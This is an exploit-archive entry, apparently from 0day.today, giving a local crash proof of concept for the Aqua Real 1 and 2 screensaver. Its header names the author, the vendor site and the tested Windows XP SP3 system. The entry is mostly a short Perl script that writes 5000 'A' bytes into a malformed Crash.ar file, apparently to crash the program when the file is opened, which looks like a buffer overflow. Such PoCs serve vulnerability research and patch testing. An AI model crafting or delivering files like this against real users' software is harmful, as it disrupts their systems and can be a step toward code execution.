id: 10107
date: 01/15/2010
title: Aqua Real v1 and 2 Local Crash PoC
author: R3d-D3v!L
cves: 

==================================
Aqua Real v1 and 2 Local Crash PoC
==================================

[*] Exploit Title: [Local Crash PoC]
[*] Author: [R3d-D3V!L]
[*] Vendor: [http://aquarealscreensaver.com/]
[*] vuln-Version: [Aqua Real 1 & 2]
[*] Tested on: [winxp-sp3]

[*] Exploit:
 
 
#!c/perl/bin/
my $file= "Crash.ar";
my $boom="\x41" x 5000;
open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n";
print myfile $boom;
print "Done..!~#\n";



#  0day.today [2023-03-24]  #